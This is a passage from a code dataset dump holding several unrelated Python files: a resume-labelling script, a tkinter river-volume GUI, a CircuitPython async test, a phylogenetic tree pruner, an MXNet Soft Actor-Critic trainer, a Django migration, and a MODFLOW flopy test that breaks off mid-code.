int(int(inputs.split(\"-\")[1].replace(\"元/年\", \"\")) / 12)\n else:\n try:\n tmp_ = int(inputs.split(\"-\")[1].replace(\"元/月\", \"\").replace(\"以下元/月\", \"\"))\n except:\n tmp_ = '无'\n return tmp_\n except:\n return '无'\n\n\ndef label_G(inputs):\n if isinstance(inputs, int):\n if 0 <= inputs <= 2000:\n return G_labels[1]\n if 2000 <= inputs <= 3999:\n return G_labels[2]\n elif 4000 <= inputs <= 5999:\n return G_labels[3]\n elif 6000 <= inputs <= 7999:\n return G_labels[4]\n elif 8000 <= inputs <= 9999:\n return G_labels[5]\n elif inputs >= 10000:\n return G_labels[6]\n else:\n return inputs\n else:\n return G_labels[0]\n\n\n\"\"\"\n技能/语言\n思就是说包含Photoshop、Corel DRAW,AI这三个技能的分成一类,包含其中的一或两项的分成一类,完全不包含的分成一类\n\"\"\"\n\n\ndef label_AA(inputs):\n if inputs == 'PS,AI.DW,(精通)' or inputs == 'Photoshop/CDR(良好)':\n return AA_labels[1]\n if inputs == '英语(熟练) Word/Excel/ PPT/Photoshop(熟练) bootstrap(良好) Jquery(熟练) HTML/CSS/JavaScript(精通)':\n return AA_labels[1]\n\n tmp_ = []\n\n for item in str(inputs).lower().split(' '):\n for item2 in item.split(\"、\"):\n item3 = item2.replace(\"熟练\", \"\").replace(\"一般\", \"\").replace(\"良好\", \"\").replace(\")\", \"\").replace(\"(\", \"\")\n tmp_.append(item3.replace(\"精通\", \"\").replace(\" adobe photoshop\", 'photoshop'))\n\n print(tmp_)\n\n label1 = ['Photoshop', 'Corel DRAW', 'AI']\n num = 0\n for i in label1:\n for j in tmp_:\n if i.lower() == j:\n num += 1\n\n if num == 3:\n return AA_labels[0]\n elif num == 2 or num == 1:\n return AA_labels[1]\n else:\n return AA_labels[2]\n\n\ndata = pd.read_excel(\"data1.xlsx\")\nprint(\"开始打标签...\")\ndata['G_preprocess'] = data['期望薪资'].apply(G_preprocess)\ndata['G_label'] = data['G_preprocess'].apply(label_G)\ndata['AA_label'] = data['技能/语言'].apply(label_AA)\ndel data['G_preprocess']\ndata.to_excel(\"results.xlsx\", index=None)\nprint('保存成功!')\n","repo_name":"Alvin2580du/alvin_py","sub_path":"business/p201909/150/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"32"} +{"seq_id":"4270389227","text":"try:\r\n import os, sys\r\n import tkinter as tk\r\n from tkinter.messagebox import askokcancel, showinfo\r\n from tkinter.filedialog import *\r\n import webbrowser\r\n import cVolumeAssessment as cMT\r\nexcept:\r\n print(\"ExceptionERROR: Missing fundamental packages (required: os, sys, tkinter, webbrowser).\")\r\n\r\ntry:\r\n sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')) + \"\\\\\")\r\n import child_gui as sg\r\n sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')) + \"\\\\.site_packages\\\\riverpy\\\\\")\r\n import config\r\n import fGlobal as fGl\r\n import cReachManager as cRM\r\n import cDefinitions as cDef\r\n import cMapper as cMp\r\nexcept:\r\n print(\"ExceptionERROR: Cannot find package files (/.site_packages/riverpy/*.py).\")\r\n\r\n\r\nclass MainGui(sg.RaModuleGui):\r\n def __init__(self, from_master):\r\n sg.RaModuleGui.__init__(self, from_master)\r\n self.ww = 580 # window width\r\n self.wh = 650 # window height\r\n self.title = \"Volume Assessment\"\r\n self.set_geometry(self.ww, self.wh, self.title)\r\n\r\n self.dir_ras_vol = \"\"\r\n\r\n self.org_dem_dir = config.dir2conditions\r\n self.mod_dem_dir = config.dir2conditions\r\n self.raster4mapping = []\r\n self.template_dir = config.dir2va + \".templates\\\\\"\r\n self.vol_name = \"\"\r\n\r\n # GUI OBJECT VARIABLES\r\n self.gui_condition = tk.StringVar()\r\n self.gui_interpreter = tk.StringVar()\r\n self.mapping = tk.BooleanVar()\r\n\r\n # LABELS\r\n self.l_reach_label = tk.Label(self, fg=\"dark slate gray\", text=\"Reaches:\")\r\n self.l_reach_label.grid(sticky=tk.W, row=0, column=0, columnspan=1, padx=self.xd, pady=self.yd * 2)\r\n self.l_reaches = tk.Label(self, fg=\"red\", text=\"Select from Reaches menu\")\r\n self.l_reaches.grid(sticky=tk.W, row=0, column=1, columnspan=5, padx=self.xd, pady=self.yd * 2)\r\n\r\n self.l_org_dem = tk.Label(self, text=\"Original DEM Raster:\")\r\n self.l_org_dem.grid(sticky=tk.W, row=4, column=0, columnspan=2, padx=self.xd, pady=self.yd)\r\n self.l_dir2orgdem = tk.Label(self, fg=\"dark slate gray\", text=\"None\")\r\n self.l_dir2orgdem.grid(sticky=tk.W, row=5, column=0, columnspan=5, padx=self.xd, pady=self.yd)\r\n self.l_mod_dem = tk.Label(self, text=\"Modified DEM Raster:\")\r\n self.l_mod_dem.grid(sticky=tk.W, row=13, column=0, columnspan=5, padx=self.xd, pady=self.yd)\r\n self.l_dir2modem = tk.Label(self, fg=\"dark slate gray\", text=\"None\")\r\n self.l_dir2modem.grid(sticky=tk.W, row=14, column=0, columnspan=5, padx=self.xd, pady=self.yd)\r\n\r\n # BUTTONS\r\n self.b_chg_org_dem = tk.Button(self, width=25, bg=\"white\", text=\"Select original DEM Raster\",\r\n command=lambda: self.select_org_dem())\r\n self.b_chg_org_dem.grid(sticky=tk.EW, row=3, column=0, columnspan=5, padx=self.xd, pady=self.yd)\r\n self.b_chg_mod_dem = tk.Button(self, width=25, text=\"Select modified DEM Raster\",\r\n command=lambda: self.select_mod_dem())\r\n self.b_chg_mod_dem.grid(sticky=tk.EW, row=12, column=0, columnspan=5, padx=self.xd, pady=self.yd)\r\n\r\n self.complete_menus()\r\n\r\n # CHECK BOXES\r\n self.cb_mapping = tk.Checkbutton(self, fg=\"dark slate gray\",\r\n text=\"Automatically run mapping after DEM / volume calculation.\",\r\n variable=self.mapping, onvalue=True, offvalue=False)\r\n self.cb_mapping.grid(sticky=tk.W, row=15, column=0, columnspan=5, padx=self.xd, pady=self.yd*2)\r\n self.cb_mapping.deselect() # select by default\r\n\r\n def complete_menus(self):\r\n # REACH DROP DOWN\r\n self.reach_lookup_needed = False\r\n self.reachmenu = tk.Menu(self.mbar, tearoff=0) # create new menu\r\n self.mbar.add_cascade(label=\"Reaches\", menu=self.reachmenu) # attach it to the menubar\r\n self.reachmenu = self.make_reach_menu(self.reachmenu)\r\n\r\n # RUN DROP DOWN\r\n self.runmenu = tk.Menu(self.mbar, tearoff=0) # create new menu\r\n self.mbar.add_cascade(label=\"Run\", menu=self.runmenu) # attach it to the menubar\r\n self.runmenu.add_command(label=\"Run: Volume Calculator\", command=lambda: self.run_volume_calculator())\r\n self.runmenu.add_command(label=\"Run: Map Maker\", command=lambda: showinfo(\"INFO\", \"Run volume calculator first.\"))\r\n\r\n def select_mod_dem(self):\r\n self.mod_dem_dir = askopenfilename(initialdir=self.mod_dem_dir.split(\".\")[0],\r\n title=\"Select modified DEM tif\",\r\n filetypes=[(\"GeoTIFF\", \"*.tif\")])\r\n if str(self.l_dir2modem).__len__() > 1:\r\n self.l_dir2modem.config(fg=\"forest green\", text=str(self.mod_dem_dir))\r\n else:\r\n self.l_dir2modem.config(fg=\"red\", text=\"Invalid directory\")\r\n\r\n def select_org_dem(self):\r\n self.org_dem_dir = askopenfilename(initialdir=self.org_dem_dir.split(\".\")[0],\r\n title=\"Select original DEM tif\",\r\n filetypes=[(\"GeoTIFF\", \"*.tif\")])\r\n if str(self.org_dem_dir).__len__() > 1:\r\n self.l_dir2orgdem.config(fg=\"forest green\", text=str(self.org_dem_dir))\r\n else:\r\n self.l_dir2orgdem.config(fg=\"red\", text=\"Invalid directory\")\r\n\r\n def run_map_maker(self):\r\n mapper = cMp.Mapper(self.vol_name, \"mt\", self.dir_ras_vol)\r\n for ras in self.raster4mapping:\r\n mapper.prepare_layout(True, map_items=[ras])\r\n\r\n self.master.bell()\r\n tk.Button(self, width=25, bg=\"pale green\", text=\"Mapping finished. Click to quit.\",\r\n command=lambda: self.quit_tab()).grid(sticky=tk.EW, row=12, column=0, columnspan=5,\r\n padx=self.xd, pady=self.yd)\r\n try:\r\n if not mapper.error:\r\n fGl.open_folder(mapper.output_dir)\r\n except:\r\n pass\r\n\r\n def run_volume_calculator(self):\r\n showinfo(\"INFORMATION\",\r\n \" Analysis may take a while.\\nPython windows seem unresponsive in the meanwhile.\\nCheck console messages.\\n \\n PRESS OK TO START\")\r\n vola = cMT.VolumeAssessment(unit_system=self.unit, org_ras_dir=self.org_dem_dir,\r\n mod_ras_dir=self.mod_dem_dir, reach_ids=self.reach_ids_applied)\r\n self.vol_name, self.dir_ras_vol = vola.get_volumes()\r\n self.raster4mapping = vola.rasters\r\n try:\r\n fGl.rm_dir(vola.cache)\r\n except:\r\n showinfo(\"WARNING\", \"Could not remove %s.\\nManual deletion required\")\r\n\r\n self.runmenu.entryconfig(1, command=lambda: self.run_map_maker())\r\n if self.mapping.get():\r\n self.run_map_maker()\r\n self.master.bell()\r\n\r\n def __call__(self):\r\n self.mainloop()\r\n","repo_name":"RiverArchitect/program","sub_path":"VolumeAssessment/volume_gui.py","file_name":"volume_gui.py","file_ext":"py","file_size_in_byte":7013,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"32"} +{"seq_id":"5479993369","text":"# test waiting within async with enter/exit functions\n\n# uPy allows normal generators to be awaitables.\n# CircuitPython does not.\n# In CircuitPython you need to have an __await__ method on an awaitable like in CPython;\n# and like in CPython, generators do not have __await__.\n\nclass Awaitable:\n def __init__(self, x):\n self.x = x\n\n def __await__(self):\n print('f start:', self.x)\n yield self.x + 1\n yield self.x + 2\n return self.x + 3\n\nclass AContext:\n async def __aenter__(self):\n print('enter')\n print('f returned:', await Awaitable(10))\n async def __aexit__(self, exc_type, exc, tb):\n print('exit', exc_type, exc)\n print('f returned:', await Awaitable(20))\n\nasync def coro():\n async with AContext():\n print('body start')\n print('body f returned:', await Awaitable(30))\n print('body end')\n\no = coro()\ntry:\n while True:\n print('coro yielded:', o.send(None))\nexcept StopIteration:\n print('finished')\n","repo_name":"KMKfw/kmkpython","sub_path":"tests/basics/async_with2.py","file_name":"async_with2.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"32"} +{"seq_id":"2897235687","text":"from Bio import Phylo\nimport os,sys,glob,re\nimport copy\n\nDIR = sys.argv[1]\nif DIR[-1] != \"/\": DIR += \"/\"\n\nt_list = ['t2','t3','t5','t6','t8','t9','t11','t12','t14','t15','t17','t18','t20','t21','t23','t24']\n\nfor t in os.listdir(DIR):\n\tif t.endswith('nex.con.tre.new'):\n\t\tname = t.split('.')[0]\n\t\ttree = Phylo.read(DIR+t, \"newick\")\n\t\tnewtree = copy.deepcopy(tree)\n\t\tfor p in t_list:\n\t\t\tnewtree.prune(p)\n\t\tPhylo.write(newtree, DIR+name+\".concat.trimmed.tre\", \"newick\")\t","repo_name":"TheDBStern/recombination_simulations_phylo","sub_path":"prune_tree.py","file_name":"prune_tree.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16855381886","text":"import argparse\nimport datetime\nimport gym\nimport math\nimport mxnet\nimport random\n\nfrom sac import SAC\nfrom sac.utils import MemoryBuffer\nfrom tensorboardX import SummaryWriter\n\nparser = argparse.ArgumentParser(description=\"Soft Actor-Critic (SAC) in MXNet\")\nparser.add_argument(\n \"--env-name\",\n default=\"MountainCarContinuous-v0\",\n help=\"Gym environment (default: MountainCarContinuous-v0)\",\n)\nparser.add_argument(\n \"--gamma\",\n type=float,\n default=0.99,\n help=\"discount factor for reward (default: 0.99)\",\n)\nparser.add_argument(\n \"--tau\",\n type=float,\n default=0.005,\n help=\"target smoothing coefficient(τ) (default: 0.005)\",\n)\nparser.add_argument(\n \"--lr\", type=float, default=0.003, help=\"learning rate (default: 0.0003)\"\n)\nparser.add_argument(\n \"--alpha\",\n type=float,\n default=0.5,\n help=\"Relative importance of the entropy term against the reward (default: 0.5)\",\n)\nparser.add_argument(\n \"--automatic_entropy_tuning\",\n type=bool,\n default=False,\n help=\"Automatically adjust α (default: False)\",\n)\nparser.add_argument(\n \"--seed\", type=int, default=42, help=\"random seed (default: 123456)\"\n)\nparser.add_argument(\n \"--batch_size\", type=int, default=256, help=\"batch size (default: 256)\"\n)\nparser.add_argument(\n \"--num_episodes\",\n type=int,\n default=1000,\n help=\"maximum number of episodes (default: 1e3)\",\n)\nparser.add_argument(\n \"--hidden_size\", type=int, default=64, help=\"hidden size (default: 64)\"\n)\nparser.add_argument(\n \"--updates_per_step\",\n type=int,\n default=100,\n help=\"number of updates betweeen actions (default: 1)\",\n)\nparser.add_argument(\n \"--env_steps\",\n type=int,\n default=2500,\n help=\"Maximum number of steps for each episode\"\n)\nparser.add_argument(\n \"--epsilon\",\n type=float,\n default=0.8,\n help=\"ε-greedy exploration factor (default: 0.3)\",\n)\nparser.add_argument(\n \"--start_steps\",\n type=int,\n default=1e4,\n help=\"Steps to enforce random actions (default: 1e4)\",\n)\nparser.add_argument(\n \"--target_update_interval\",\n type=int,\n default=1,\n help=\"Value target update per no. of updates per step (default: 1)\",\n)\nparser.add_argument(\n \"--replay_size\", type=int, default=1e6, help=\"size of replay buffer (default: 1e6)\",\n)\nparser.add_argument(\n \"--render\",\n type=int,\n default=0,\n help=\"Render mode [0: disabled, 1: every episode, 2: every evaluation] (default: 0)\",\n)\nparser.add_argument(\n \"--eval_X\",\n type=int,\n default=10,\n help=\"Evaluates a policy a policy every X episodes (default: 10; -1 to disable it)\",\n)\nparser.add_argument(\n \"--verbose\",\n type=int,\n default=1,\n help=\"Set verbosity [0: disabled, 1: every `eval_X` episodes, 2: every episode] (default: 1)\",\n)\nparser.add_argument(\"--gpu\", action=\"store_true\", help=\"run on GPU (default: False)\")\nargs = parser.parse_args()\n\n# Environment\nenv = gym.make(args.env_name)\nenv._max_episode_steps = int(args.env_steps)\n\n# Seed tools\nmxnet.random.seed(args.seed)\nrandom.seed(args.seed)\nenv.seed(args.seed)\n\n# Agent\nagent = SAC(env.observation_space.shape[0], env.action_space, **vars(args))\n\n# TensorboardX\nfilename = \"{}_SAC_{}\".format(\n datetime.datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\"), args.env_name\n)\nwriter = SummaryWriter(logdir=\"logs/{}\".format(filename))\n\n# Memory buffer\nmemory = MemoryBuffer(args.replay_size)\n\n# Training Loop\ntotal_numsteps = 0\nupdates = 0\n\nfor i_episode in range(args.num_episodes):\n episode_reward = 0\n episode_steps = 0\n done = False\n state = env.reset()\n transitions = list()\n\n while not done:\n p = random.random()\n threshold = args.epsilon + math.exp(-total_numsteps / args.start_steps)\n if p < threshold:\n action = env.action_space.sample() # Sample random action\n else:\n action = agent.select_action(state) # Sample action from policy\n\n if args.render > 1:\n env.render()\n\n next_state, reward, done, _ = env.step(action)\n episode_steps += 1\n total_numsteps += 1\n episode_reward += reward\n\n # Ignore the \"done\" signal if it comes from hitting the time horizon mask = (1-d)\n mask = 1 if episode_steps == env._max_episode_steps else int(not done)\n transitions.append((state, action, reward, next_state, mask))\n\n state = next_state\n\n memory.push_bulk(transitions) # Append transition to memory\n if len(memory) > args.batch_size:\n # Number of updates per step in environment\n for i in range(args.updates_per_step):\n # Update parameters of all the networks\n (\n critic_1_loss,\n critic_2_loss,\n policy_loss,\n ent_loss,\n alpha,\n ) = agent.update_parameters(memory, args.batch_size, updates)\n\n writer.add_scalar(\"loss/critic_1\", critic_1_loss, updates)\n writer.add_scalar(\"loss/critic_2\", critic_2_loss, updates)\n writer.add_scalar(\"loss/policy\", policy_loss, updates)\n writer.add_scalar(\"loss/entropy_loss\", ent_loss, updates)\n writer.add_scalar(\"entropy_temprature/alpha\", alpha, updates)\n updates += 1\n\n writer.add_scalar(\"reward/train\", episode_reward, i_episode)\n if args.verbose == 2:\n print(\n \"Episode: {}, total numsteps: {}, episode steps: {}, reward: {}\".format(\n i_episode, total_numsteps, episode_steps, round(episode_reward, 2)\n )\n )\n\n if args.eval_X > 0 and args.verbose > 0:\n if i_episode % args.eval_X == 0 and i_episode > 0:\n state = env.reset()\n episode_reward = 0\n done = False\n while not done:\n action = agent.select_action(state, eval=True)\n if args.render > 0:\n env.render()\n\n next_state, reward, done, _ = env.step(action)\n episode_reward += reward\n\n state = next_state\n\n writer.add_scalar(\"avg_reward/test\", episode_reward, i_episode)\n\n print(\"----------------------------------------\")\n print(\n \"Test Episodes: {}, Avg. Reward: {}\".format(\n i_episode, round(episode_reward, 2)\n )\n )\n print(\"----------------------------------------\")\n env.close()\n\nagent.save_model(\"saved_models/{}\".format(filename))\n","repo_name":"artur-deluca/sac-mxnet","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6475,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"72727055770","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('restful', '0102_auto_20160823_2223'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='notice',\n name='template',\n field=models.CharField(default='default', unique=True, max_length=255, verbose_name='\\u6a21\\u677f\\u540d\\u79f0'),\n ),\n migrations.AlterField(\n model_name='noticetemplate',\n name='category',\n field=models.CharField(default='', max_length=255, verbose_name='\\u6d88\\u606f\\u6a21\\u677f\\u5206\\u7c7b', choices=[('reward', '\\u4e2d\\u5956\\u6d88\\u606f'), ('signup', '\\u6ce8\\u518c\\u6d88\\u606f'), ('system', '\\u7cfb\\u7edf\\u6d88\\u606f'), ('payment', '\\u652f\\u4ed8\\u6d88\\u606f'), ('confirm', '\\u5546\\u54c1\\u786e\\u8ba4')]),\n ),\n ]\n","repo_name":"bopo/surprise","sub_path":"service/backends/migrations/0103_auto_20160902_1352.py","file_name":"0103_auto_20160902_1352.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"23225995910","text":"import os\nimport numpy as np\nimport shutil\nimport math\nimport targets\n\ntry:\n import flopy\n from flopy.utils.lgrutil import Lgr\nexcept:\n msg = \"Error. FloPy package is not available.\\n\"\n msg += \"Try installing using the following command:\\n\"\n msg += \" pip install flopy\"\n raise Exception(msg)\n\nfrom framework import testing_framework\nfrom simulation import Simulation\n\nmf6exe = os.path.abspath(targets.target_dict[\"mf6\"])\n\nname = \"gwf\"\nmvr_scens = [\"mltmvr\", \"mltmvr5050\", \"mltmvr7525\"]\nws = os.path.join(\"temp\", name)\nexdirs = [ws]\nsim_workspaces = []\ngwf_names = []\n\n# ----------------\n# Universal input\n# ----------------\nnumdays = 1\nperlen = [1] * numdays\nnper = len(perlen)\nnstp = [1] * numdays\ntsmult = [1.0] * numdays\n\nicelltype = [1, 0, 0]\n\n# Aquifer properties\nhk = 1\nk33 = 1\n\n# Solver settings\nnouter, ninner = 100, 300\nhclose, rclose, relax = 1e-6, 1e-6, 0.97\n\n# ------------------------------------------\n# Static input associated with parent model\n# ------------------------------------------\nnlayp = 3\nnrowp = 15\nncolp = 15\ndelrp = 1544.1 / ncolp\ndelcp = 1029.4 / nrowp\nx = [round(x, 3) for x in np.linspace(50.0, 45.0, ncolp)]\ntopp = np.repeat(x, nrowp).reshape((15, 15)).T\nz = [round(z, 3) for z in np.linspace(50.0, 0.0, nlayp + 1)]\nbotmp = [topp - z[len(z) - 2], topp - z[len(z) - 3], topp - z[0]]\nidomainp = np.ones((nlayp, nrowp, ncolp), dtype=np.int32)\n# Zero out where the child grid will reside\nidomainp[0:2, 6:11, 2:8] = 0\n\n\n# ------------------------------------------\n# Common SFR data for all parent models\n# ------------------------------------------\n\n# Package_data information\nsfrcells = [\n (0, 0, 1),\n (0, 1, 1),\n (0, 2, 1),\n (0, 2, 2),\n (0, 3, 2),\n (0, 4, 2),\n (0, 4, 3),\n (0, 5, 3),\n (0, 8, 8),\n (0, 8, 9),\n (0, 8, 10),\n (0, 8, 11),\n (0, 7, 11),\n (0, 7, 12),\n (0, 6, 12),\n (0, 6, 13),\n (0, 6, 14),\n (0, 5, 14),\n]\nrlen = [\n 65.613029,\n 72.488609,\n 81.424789,\n 35.850410,\n 75.027390,\n 90.887520,\n 77.565651,\n 74.860397,\n 120.44695,\n 112.31332,\n 109.00368,\n 91.234566,\n 67.486000,\n 24.603355,\n 97.547943,\n 104.97595,\n 8.9454498,\n 92.638367,\n]\nrwid = 5\nrgrd1 = 0.12869035e-02\nrgrd2 = 0.12780087e-02\nrbtp = [\n 49.409676,\n 49.320812,\n 49.221775,\n 49.146317,\n 49.074970,\n 48.968212,\n 48.859821,\n 48.761742,\n 45.550678,\n 45.401943,\n 45.260521,\n 45.132568,\n 45.031143,\n 44.972298,\n 44.894241,\n 44.764832,\n 44.692032,\n 44.627121,\n]\nrbth = 1.5\nrbhk = 0.1\nman = 0.04\nustrf = 1.0\nndv = 0\n\n# -----------------------------------------------\n# Child model SFR data (common to all scenarios)\n# -----------------------------------------------\nconnsc = []\nfor i in np.arange(89):\n if i == 0:\n connsc.append((i, -1 * (i + 1)))\n elif i == 88:\n connsc.append((i, i - 1))\n else:\n connsc.append((i, i - 1, -1 * (i + 1)))\n\n# Package_data information\nsfrcellsc = [\n (0, 0, 3),\n (0, 1, 3),\n (0, 1, 2),\n (0, 2, 2),\n (0, 2, 1),\n (0, 3, 1),\n (0, 4, 1),\n (0, 5, 1),\n (0, 6, 1),\n (0, 7, 1),\n (0, 7, 2),\n (0, 7, 3),\n (0, 7, 4),\n (0, 6, 4),\n (0, 5, 4),\n (0, 4, 4),\n (0, 3, 4),\n (0, 3, 5),\n (0, 3, 6),\n (0, 4, 6),\n (0, 4, 7),\n (0, 5, 7),\n (0, 5, 8),\n (0, 6, 8),\n (0, 7, 8),\n (0, 7, 7),\n (0, 8, 7),\n (0, 8, 6),\n (0, 8, 5),\n (0, 8, 4),\n (0, 9, 4),\n (0, 9, 3),\n (0, 10, 3),\n (0, 11, 3),\n (0, 12, 3),\n (0, 13, 3),\n (0, 13, 4),\n (0, 14, 4),\n (0, 14, 5),\n (0, 14, 6),\n (0, 13, 6),\n (0, 13, 7),\n (0, 12, 7),\n (0, 11, 7),\n (0, 11, 8),\n (0, 10, 8),\n (0, 9, 8),\n (0, 8, 8),\n (0, 7, 8),\n (0, 7, 9),\n (0, 6, 9),\n (0, 5, 9),\n (0, 4, 9),\n (0, 3, 9),\n (0, 2, 9),\n (0, 2, 10),\n (0, 1, 10),\n (0, 0, 10),\n (0, 0, 11),\n (0, 0, 12),\n (0, 0, 13),\n (0, 1, 13),\n (0, 2, 13),\n (0, 3, 13),\n (0, 4, 13),\n (0, 5, 13),\n (0, 6, 13),\n (0, 6, 12),\n (0, 7, 12),\n (0, 8, 12),\n (0, 9, 12),\n (0, 10, 12),\n (0, 11, 12),\n (0, 12, 12),\n (0, 12, 13),\n (0, 13, 13),\n (0, 13, 14),\n (0, 13, 15),\n (0, 12, 15),\n (0, 11, 15),\n (0, 10, 15),\n (0, 10, 16),\n (0, 9, 16),\n (0, 9, 15),\n (0, 8, 15),\n (0, 7, 15),\n (0, 6, 15),\n (0, 6, 16),\n (0, 6, 17),\n]\n\nrlenc = [\n 24.637711,\n 31.966246,\n 26.376442,\n 11.773884,\n 22.921772,\n 24.949730,\n 23.878050,\n 23.190311,\n 24.762365,\n 24.908625,\n 34.366299,\n 37.834534,\n 6.7398176,\n 25.150850,\n 22.888292,\n 24.630053,\n 24.104542,\n 35.873375,\n 20.101446,\n 35.636936,\n 39.273537,\n 7.8477302,\n 15.480835,\n 22.883194,\n 6.6126003,\n 31.995899,\n 9.4387379,\n 35.385513,\n 35.470993,\n 23.500074,\n 18.414469,\n 12.016913,\n 24.691732,\n 23.105467,\n 23.700483,\n 19.596104,\n 5.7555680,\n 34.423119,\n 36.131992,\n 7.4424477,\n 35.565659,\n 1.6159637,\n 32.316132,\n 20.131876,\n 6.5242062,\n 25.575630,\n 25.575630,\n 24.303566,\n 1.9158504,\n 21.931326,\n 23.847176,\n 23.432203,\n 23.248718,\n 23.455051,\n 15.171843,\n 11.196334,\n 34.931976,\n 4.4492774,\n 36.034172,\n 38.365566,\n 0.8766859,\n 30.059759,\n 25.351671,\n 23.554117,\n 24.691738,\n 26.074226,\n 13.542957,\n 13.303432,\n 28.145079,\n 24.373089,\n 23.213642,\n 23.298107,\n 24.627758,\n 27.715137,\n 1.7645065,\n 39.549232,\n 37.144009,\n 14.943290,\n 24.851254,\n 23.737432,\n 15.967736,\n 10.632832,\n 11.425938,\n 20.009295,\n 24.641207,\n 27.960585,\n 4.6452723,\n 36.717735,\n 34.469074,\n]\nrwidc = 5\nrgrdc = 0.14448310e-02\nrbtpc = [\n 48.622822,\n 48.581932,\n 48.539783,\n 48.512222,\n 48.487160,\n 48.452576,\n 48.417301,\n 48.383297,\n 48.348656,\n 48.312775,\n 48.269951,\n 48.217793,\n 48.185593,\n 48.162552,\n 48.127850,\n 48.093521,\n 48.058315,\n 48.014984,\n 47.974548,\n 47.934284,\n 47.880165,\n 47.846127,\n 47.829273,\n 47.801556,\n 47.780251,\n 47.752357,\n 47.722424,\n 47.690044,\n 47.638855,\n 47.596252,\n 47.565975,\n 47.543991,\n 47.517471,\n 47.482941,\n 47.449127,\n 47.417850,\n 47.399536,\n 47.370510,\n 47.319538,\n 47.288059,\n 47.256992,\n 47.230129,\n 47.205616,\n 47.167728,\n 47.148472,\n 47.125282,\n 47.088329,\n 47.052296,\n 47.033356,\n 47.016129,\n 46.983055,\n 46.948902,\n 46.915176,\n 46.881439,\n 46.853535,\n 46.834484,\n 46.801159,\n 46.772713,\n 46.743465,\n 46.689716,\n 46.661369,\n 46.639019,\n 46.598988,\n 46.563660,\n 46.528805,\n 46.492130,\n 46.463512,\n 46.444118,\n 46.414173,\n 46.376232,\n 46.341858,\n 46.308254,\n 46.273632,\n 46.235821,\n 46.214523,\n 46.184677,\n 46.129272,\n 46.091644,\n 46.062897,\n 46.027794,\n 45.999111,\n 45.979897,\n 45.963959,\n 45.941250,\n 45.908993,\n 45.870995,\n 45.847439,\n 45.817558,\n 45.766132,\n]\nrbthc = 1.5\nrbhkc = 0.1\nmanc = 0.04\nustrfc = 1.0\nndvc = 0\n\n\n# ---------------------------------------------------\n# Scenario specific parent model SFR connection data\n# ---------------------------------------------------\nconnsp_base = [\n (0, -1),\n (1, 0, -2),\n (2, 1, -3),\n (3, 2, -4),\n (4, 3, -5),\n (5, 4, -6),\n (6, 5, -7),\n (7, 6),\n (8, -9),\n (9, 8, -10),\n (10, 9, -11),\n (11, 10, -12),\n (12, 11, -13),\n (13, 12, -14),\n (14, 13, -15),\n (15, 14, -16),\n (16, 15, -17),\n (17, 16),\n]\n\nconnsp_mvr = [\n (0, -1),\n (1, 0, -2),\n (2, 1, -3),\n (3, 2, -4),\n (4, 3, -5),\n (5, 4, -6),\n (6, 5, -7),\n (7, 6),\n (8, -9),\n (9, 8, -10),\n (10, 9, -11),\n (11, 10, -12),\n (12, 11, -13),\n (13, 12, -14),\n (14, 13, -15),\n (15, 14),\n (16, -17),\n (17, 16),\n]\n\nscen_conns = [connsp_base, connsp_mvr, connsp_mvr]\n\n# ---------------------------------------------------\n# Scenario specific MVR connection data\n# (for simulation- and gwf-level MVRs)\n# ---------------------------------------------------\n# parent model gwf mvr\n# static data\nmvrpack = [[\"WEL-1\"], [\"SFR-parent\"]]\nmaxpackages = len(mvrpack)\nmaxmvr = 10\n\n# scenario specific data\nparent_mvr_frac = [None, 0.50, 0.75]\n\n\ndef get_parent_mvr_info(frac):\n # return the appropriate mvr info for the current scenario\n mvrperioddata = [(\"WEL-1\", 0, \"SFR-parent\", 10, \"FACTOR\", 1.0)]\n if frac is not None:\n mvrperioddata.append(\n (\"SFR-parent\", 15, \"SFR-parent\", 16, \"FACTOR\", frac)\n )\n\n mvrspd = {0: mvrperioddata}\n\n return mvrspd\n\n\n# child model gwf mvr_scen\nmvrpackc = [[\"WEL-2\"], [\"SFR-child\"]]\nmaxpackagesc = len(mvrpackc)\nmvrperioddatac = [(\"WEL-2\", 0, \"SFR-child\", 53, \"FACTOR\", 1.0)]\nmvrspdc = {0: mvrperioddatac}\n\n\n# simulation mvr\ndef generate_parentmod_sfr_input(conns):\n pkdat = []\n for i in np.arange(len(rlen)):\n if i < 8:\n rgrd = rgrd1\n else:\n rgrd = rgrd2\n\n cln_list = len(\n [itm for itm in conns[i] if itm is not None and itm is not np.nan]\n )\n ncon = cln_list - 1\n pkdat.append(\n (\n i,\n sfrcells[i],\n rlen[i],\n rwid,\n rgrd,\n rbtp[i],\n rbth,\n rbhk,\n man,\n ncon,\n ustrf,\n ndv,\n )\n )\n\n return pkdat\n\n\ndef generate_childmod_sfr_input():\n pkdatc = []\n for i in np.arange(len(rlenc)):\n cln_list = len(\n [itm for itm in connsc[i] if itm is not None and itm is not np.nan]\n )\n nconc = cln_list - 1\n pkdatc.append(\n (\n i,\n sfrcellsc[i],\n rlenc[i],\n rwidc,\n rgrdc,\n rbtpc[i],\n rbthc,\n rbhkc,\n manc,\n nconc,\n ustrfc,\n ndvc,\n )\n )\n\n return pkdatc\n\n\ndef instantiate_base_simulation(scen_nam, gwfname, gwfnamec):\n # All pckgs between 3 test models the same except for parent model SFR input\n # static model data\n scen_ws = ws + \"-\" + scen_nam\n sim_workspaces.append(scen_ws)\n gwf_names.append(gwfname)\n sim = flopy.mf6.MFSimulation(\n sim_name=name,\n version=\"mf6\",\n exe_name=mf6exe,\n 